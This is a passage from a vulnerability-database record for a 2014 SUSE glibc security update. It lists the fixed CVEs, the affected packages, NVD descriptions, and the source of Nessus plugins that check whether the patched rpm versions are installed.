ID SUSE-SU-2014:1129-1 Type suse Reporter Suse Modified 2014-09-15T19:06:41
Description
This glibc update fixes a critical privilege escalation problem and two
additional issues:
* bnc#892073: An off-by-one error leading to a heap-based buffer
overflow was found in __gconv_translit_find(). An exploit that
targets the problem is publicly available. (CVE-2014-5119)
* bnc#836746: Avoid race between {, __de}allocate_stack and
__reclaim_stacks during fork.
* bnc#844309: Fixed various overflows, reading large /etc/hosts or
long names. (CVE-2013-4357)
* bnc#894553, bnc#894556: Fixed various crashes on invalid input in
IBM gconv modules. (CVE-2014-6040, CVE-2012-6656)
{"enchantments": {"score": {"value": 8.0, "vector": "NONE", "modified": "2016-09-04T12:14:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-6656", "CVE-2014-6040", "CVE-2014-5119"]}, {"type": "nessus", "idList": ["SUSE_SU-2015-0164-1.NASL", "SUSE_SU-2014-1129-1.NASL", "MANDRIVA_MDVSA-2014-175.NASL", "SUSE_SU-2015-0170-1.NASL", "SUSE_11_GLIBC-150129.NASL", "UBUNTU_USN-2432-1.NASL", "SUSE_SU-2015-0167-1.NASL", "DEBIAN_DLA-97.NASL", "OPENSUSE-2014-536.NASL", "DEBIAN_DSA-3142.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851101", "OPENVAS:1361412562310850610", "OPENVAS:1361412562310703142", "OPENVAS:703142", "OPENVAS:1361412562310869060", "OPENVAS:703012", "OPENVAS:1361412562310120241", "OPENVAS:1361412562310850799", "OPENVAS:1361412562310703012", "OPENVAS:1361412562310871301"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:2CAD2503E6F8FEFB9D3E259027678487"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13947", "SECURITYVULNS:DOC:31067"]}, {"type": "f5", "idList": ["SOL16342", "SOL16435", "F5:K15640", "SOL15640"]}, {"type": "debian", "idList": ["DEBIAN:DLA-97-1:B684D", "DEBIAN:DSA-3142-1:A3964", "DEBIAN:DSA-3012-1:04A85", "DEBIAN:DLA-43-1:D57FA"]}, {"type": "ubuntu", "idList": ["USN-2432-1", "USN-2328-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:1115-1", "SUSE-SU-2014:1128-1", "SUSE-SU-2014:1125-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:34421"]}, {"type": "seebug", "idList": ["SSV:87222"]}, {"type": "zdt", "idList": ["1337DAY-ID-22553"]}, {"type": "amazon", "idList": ["ALAS-2014-399", "ALAS-2015-468", "ALAS-2015-495"]}, {"type": "redhat", "idList": ["RHSA-2014:1118", "RHSA-2015:0327", "RHSA-2015:0016", "RHSA-2014:1110"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-0327", "ELSA-2015-0016", "ELSA-2014-1110"]}, {"type": "centos", "idList": ["CESA-2015:0016", "CESA-2015:0327", "CESA-2014:1110"]}, {"type": "slackware", "idList": ["SSA-2014-296-01"]}], "modified": "2016-09-04T12:14:55"}, "vulnersScore": 8.0}, "reporter": "Suse", "id": "SUSE-SU-2014:1129-1", "modified": "2014-09-15T19:06:41", "published": "2014-09-15T19:06:41", "history": [], "bulletinFamily": "unix", "viewCount": 4, "cvelist": ["CVE-2014-5119", "CVE-2014-6040", "CVE-2013-4357", "CVE-2012-6656"], "affectedPackage": [{"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-32bit", "packageFilename": "glibc-32bit-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "nscd", "packageFilename": "nscd-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-locale-32bit", "packageFilename": "glibc-locale-32bit-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "nscd", "packageFilename": "nscd-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-32bit", "packageFilename": "glibc-32bit-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-profile-32bit", "packageFilename": "glibc-profile-32bit-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-profile", "packageFilename": "glibc-profile-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "nscd", "packageFilename": "nscd-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc", "packageFilename": "glibc-2.11.3-17.45.53.1.i686.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i686"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel-32bit", "packageFilename": "glibc-devel-32bit-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-html", "packageFilename": "glibc-html-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc", "packageFilename": "glibc-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-i18ndata", "packageFilename": "glibc-i18ndata-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-locale", "packageFilename": "glibc-locale-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.11.3-17.45.53.1.i686.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i686"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc", "packageFilename": "glibc-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel", "packageFilename": "glibc-devel-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-info", "packageFilename": "glibc-info-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-devel-32bit", "packageFilename": "glibc-devel-32bit-2.11.3-17.45.53.1.s390x.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "s390x"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc", "packageFilename": "glibc-2.11.3-17.45.53.1.i586.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "i586"}, {"packageVersion": "2.11.3-17.45.53.1", "packageName": "glibc-locale-32bit", "packageFilename": "glibc-locale-32bit-2.11.3-17.45.53.1.x86_64.rpm", "operator": "lt", "OSVersion": "11.2", "OS": "SUSE Linux Enterprise Server LTSS", "arch": "x86_64"}], "type": "suse", "hash": "3e601740b44aa7d5d7f5b6c5973acb321e591be458dba6929798eaaf4e2c1c72", "references": ["https://bugzilla.novell.com/894553", "https://bugzilla.novell.com/836746", "https://bugzilla.novell.com/844309", "https://bugzilla.novell.com/894556", "https://bugzilla.novell.com/892073", "http://download.suse.com/patch/finder/?keywords=cd8403453563e9d5a949d2219d62a993"], "description": "This glibc update fixes a critical privilege escalation problem and two\n additional issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n * bnc#836746: Avoid race between {, __de}allocate_stack and\n __reclaim_stacks during fork.\n * bnc#844309: Fixed various overflows, reading large /etc/hosts or\n long names. (CVE-2013-4357)\n * bnc#894553, bnc#894556: Fixed various crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656)\n\n Security Issues:\n\n * CVE-2012-6656\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6656\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6656</a>>\n * CVE-2013-4357\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4357\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4357</a>>\n * CVE-2014-5119\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5119</a>>\n * CVE-2014-6040\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040</a>>\n\n", "title": "Security update for glibc (important)", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00020.html", "lastseen": "2016-09-04T12:14:55", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}
{"cve": [{"lastseen": "2019-05-29T18:12:27", "bulletinFamily": "NVD", "description": "iconvdata/ibm930.c in GNU C Library (aka glibc) before 2.16 allows context-dependent attackers to cause a denial of service (out-of-bounds read) via a multibyte character value of \"0xffff\" to the iconv function when converting IBM930 encoded data to UTF-8.", "modified": "2017-07-01T01:29:00", "id": "CVE-2012-6656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6656", "published": "2014-12-05T16:59:00", "title": "CVE-2012-6656", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of \"0xffff\" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.", "modified": "2017-01-03T02:59:00", "id": "CVE-2014-6040", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6040", "published": "2014-12-05T16:59:00", "title": "CVE-2014-6040", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:47", "bulletinFamily": "NVD", "description": "Off-by-one error in the __gconv_translit_find function in gconv_trans.c in GNU C Library (aka glibc) allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via vectors related to the CHARSET environment variable and gconv transliteration modules.", "modified": "2017-01-07T03:00:00", "id": "CVE-2014-5119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5119", "published": "2014-08-29T16:55:00", "title": "CVE-2014-5119", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-03T12:18:13", "bulletinFamily": "scanner", "description": "This glibc update fixes a critical privilege escalation problem and\ntwo additional issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#836746: Avoid race between {, __de}allocate_stack\n and __reclaim_stacks during fork.\n\n - bnc#844309: Fixed various overflows, reading large\n /etc/hosts or long names. (CVE-2013-4357)\n\n - bnc#894553, bnc#894556: Fixed various crashes on invalid\n input in IBM gconv modules. (CVE-2014-6040,\n CVE-2012-6656)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2014-1129-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83639", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2014:1129-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2014:1129-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83639);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 68983, 69470, 69472, 69738);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2014:1129-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This glibc update fixes a critical privilege escalation problem and\ntwo additional issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#836746: Avoid race between {, __de}allocate_stack\n and __reclaim_stacks during fork.\n\n - bnc#844309: Fixed various overflows, reading large\n /etc/hosts or long names. (CVE-2013-4357)\n\n - bnc#894553, bnc#894556: Fixed various crashes on invalid\n input in IBM gconv modules. (CVE-2014-6040,\n CVE-2012-6656)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=836746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=cd8403453563e9d5a949d2219d62a993\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?12c9123b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-5119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2014/suse-su-20141129-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab20b15d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP2 LTSS :\n\nzypper in -t patch slessp2-glibc-9721\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-devel-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-html-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-i18ndata-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-info-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-locale-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-profile-2.11.3-17.45.53.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"nscd-2.11.3-17.45.53.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix one security issue and several bugs :\n\nSecurity issue fixed :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\nBugs fixed :\n\n - don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83673", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0164-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0164-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83673);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 69470, 69472);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0164-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix one security issue and several bugs :\n\nSecurity issue fixed :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\nBugs fixed :\n\n - don't touch user-controlled stdio locks in forked child\n (bsc#864081, GLIBC BZ #12847)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\n - Add check for RTLD_DEEPBIND environment variable to\n disable deepbinding of NSS modules (bsc#888860)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=888860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909053\"\n );\n # https://download.suse.com/patch/finder/?keywords=0d01346ebb9d9e39d1c632f49a85a7ee\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2d6d44bc\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150164-1.html\n script_set_attribute(\n 